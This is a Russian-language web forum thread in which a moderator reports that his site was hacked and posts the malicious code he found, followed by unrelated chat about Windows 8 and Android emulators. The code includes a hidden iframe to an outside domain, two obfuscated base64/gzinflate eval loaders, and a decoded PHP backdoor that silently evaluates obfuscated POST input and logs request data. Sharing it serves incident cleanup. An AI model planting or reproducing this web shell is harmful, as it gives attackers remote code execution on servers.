Вы не зашли.
Главная » Общение » Скучно епт... [2]
#881. tipsun Off (19)
Moderator
2013.03.20 19:07
Круто, мой сайт взломал хацкер smile
Не могу избавиться от вредоносного кода чет.
Код:
<?php
// Что я нашел лишнего у себя.
//<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?i=1238769></iframe>
// Было в страницах
// Еще 2 файла загружены оба с название default.php содержимое 1-ого в корне:
eval(gzinflate(base64_decode("DZQ3EqtaAgX38qP3i0AgfE1NgBHee0imMBcPwl4Qq5+3gI5OnwYwH/80TzfXY36AP0W+A4r4XwXKbwX+/CNWLr4vd8pxInf+Or9ruLTWh1C0SHp+Xzfj8Aij13VNtGcpByyNLMu9GY4FRXrAUb6r2aRRrvWy2brWFf2a1JUmSLxi22IzyLuRVPEGIf/VfdRsb50BCIMLpdVuCh21eqqHlxFUk+XLA+XC1JTaGVf4JnHmlYz2vaC3fbybF2WYjdL3eIgWlmmriKhUi13cI+qO2OldJmkoxc7I57MvLr7tac4GMsBOS1vxmqOGVY4hfPxA6zYY7eYRj6a4PECFOqrED2d8hDWooWNGX7WFQToU/KCUoVUKfEfrj/J4Js4nHYa2H7xaL0coTbljAc4J0Rcqb8n6cZbkTxjlVeHPltTuG30+SchedxmHyN4MaBfaXHQaucxnl9HZj5JVZvxJByLg41LhcGNCJzw4bfoR3oB2/ZtUvn71VrfjNQnjdmZPt6akzyRME4w+btxg3nxXaBpq4eeqss/vQtbW/OAE5MLEi8tAPlQK5adUMQTq7uPyI7Xv7keB5uO8ZM9gNqegw5Fy90IxKBZ0MWqdBu2ieVg/WB13vB7tJ9tl2CRA70YD1zPVkvJO7md0RwDwUdfp8m2nN0ivT4C9kdNblKxXkYOmP1OIq57V+Nz5pgnMkGIV3K680z9oVOnSnTIG65p8P9Rv14vmCsYRJ1WGDsXrFBlvziW2EPhs5KvTvl0r+tjvwmZeE98hG6E+nRngJ2nt5pD28lSw2Uoh1HnyR41f0Fdkx3ypw+MhOAgXeX3wEUrxvhUUrBh939yAOdxnlUoq/UwVPUTBZjRGRdlpliPfmvExyAvTWFGOJkgFBmwLo1tlyNbuOsOp8eyZo3d9R3aSZqSo1VqWAfMdTYzANba7FVcC67Iycz2J1RN4zPveXeoFgik5vm+MTxWhQNHcVmYsAFHsHZWjbLioiWSqvZNpMlJ0tUO1cyVzNsxJSjJdKYi/mIx4yObKye8FM5vzy/I1OUaU8nvRbfKdfTYg/T0VwI50iMF9jN/57/rhI+IdtyS1ARm10XiFdejv8UzIzuElCLTRh7kuRY0/LoX+fK3Sg1TZGkTOEo1P98P7l6ClHuhIBiqER3HfmMxHpgYJTkkU8Sy2PIrElqu7SgOzd2LPo+kt/21AHy17EcpPNxi9VgbHNPGfW2ZJQ/1JV/JmM+XO4hj4j6yR253svbYkvdpnQykT6Itm6m/skX4A0lHsOXZl/G4EfZJDG97FjEBFYKC4WJfWwlKae+xblPaOHVHDz/tDImIp9wugWYpnRSV/cvsvzRUfnfDMBgTNmWNAuHFHXRmTUDT//AipY2FYS75uWmfdXKjmmuszqW/HJFnD3Q1nT2zBMS0WiJKen/F98E/9ujNn1cd5k1W8VUXxlvQEdBaQKoAGBU2DWIN0HGS8ohCNjU+tC6YJZmnyzNq9FD5xSH99PJIp+73TRF1zUYZKSY3zGdJxhdWJZMR5g0reYLlSv/ZH4FzEzGsrcmpvud3z1/GC69eBtPYg+5OEmnoJ1ULfvh1Dj48Y7w6FEQLiTsbdRXGVHHJ1XXh9WYmP01+PFVOEWQg2Q2IyI+OEg42VdWh0RpHamhHH+DjNV45X/50tuM5pvyXEHFbmtv1mPSkTpFx8Q8loQe8cFe4izBhKqr37KfMRGfQKxOt5fZTaoWkWgc78sK/XVf73n3///fc//wc=")));
// Содержимое 2-ого в папке "/lib/":
eval(gzinflate(base64_decode("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"))); ?>
Вложения
pdj.zip 20kb [загрузок: 334]
#882. Gemorroj Off (108)
Administrator
2013.03.20 20:08
почему не можешь?
#883. tipsun Off (19)
Moderator
2013.03.20 20:08
Gemorroj, ну и пошалил он там. Теперь с адреса http://tipsun.h2m.ru/design/default.css идет redirect на http://habboigratis.altervista.org/ohmi.html?h=1238769.
Именно с главной страницы идет редирект.
Т.е. если я уберу "<link rel="stylesheet" type="text/css" href="design/default.css" />", то все нормально. А если оставлю, то сразу редирект.
При прямом доступе выходит моя таблица стилей.
Добавлено спустя   3 минуты  29 секунд:
Выложил оригинал, как было до удаления хацкера следов.
Добавлено спустя   7 минут  4 секунды:
Именно в этот момент резюме вывесил на avito и еще одном (гугл в помощь) и там указал свой сайт. А там с хрома и наверное у всех, у кого есть антивирус, выдало предупреждение. Теперь мне точно никто не напишет sad ПИчаль, тоска.
#884. tipsun Off (19)
Moderator
2013.03.20 20:08
Нашел, .htaccess файл в корне лежал. Удалил.
С тотал коммандера файл .htaccess не отображался. Через h2m файловый менеджер заметил.
Показать скрытый текст

Добавлено спустя   7 минут  52 секунды:
Вроде граб не дырявый. А вот насчет остальных скриптов, которые у меня там были фиг знает. Я там что только не держал.
#885. tipsun Off (19)
Moderator
2013.03.20 21:09
Вот что было спрятано в base64:
Код:
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
    print $_GET['r'];
} elseif (isset($_POST['e'])) {
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
    $data file_get_contents('php://input');
    if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
    if (strlen($data) > 12) {
        $fp=@fopen('tmpfile','a');
        @flock($fpLOCK_EX);
        @fputs($fp$_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
        @flock($fpLOCK_UN);
        @fclose($fp);
    }
}
exit;
#886. tipsun Off (19)
Moderator
2013.04.06 10:10
Windows 8 радует всякими мелкими мобильными приложениями smile
Не все конечно отличного качества.
#887. tipsun Off (19)
Moderator
2013.04.06 16:04
Android apps можно запускать при помощи программы: http://www.bluestacks.com/
#888. semmit69 Off (-4)
Участник
2013.04.07 15:03
tipsun написал:
Android apps можно запускать при помощи программы: http://www.bluestacks.com/
0_о надо будет запомнить..
#889. semmit69_guest
Гость
2013.04.15 18:06
http://www.youtube.com/watch?v=ASO_zypdnsQ - типа поржать, psy. big_smile
#890. tipsun Off (19)
Moderator
2013.04.20 13:01
На mail.com можно зарегать почтовый ящик с хорощим @адресом. Их там около 200.
Примеры:
Показать скрытый текст
Страниц: 187 88 89 90 91101 Все
Главная
WEB
PunBB Mod v0.6.2
0.030 s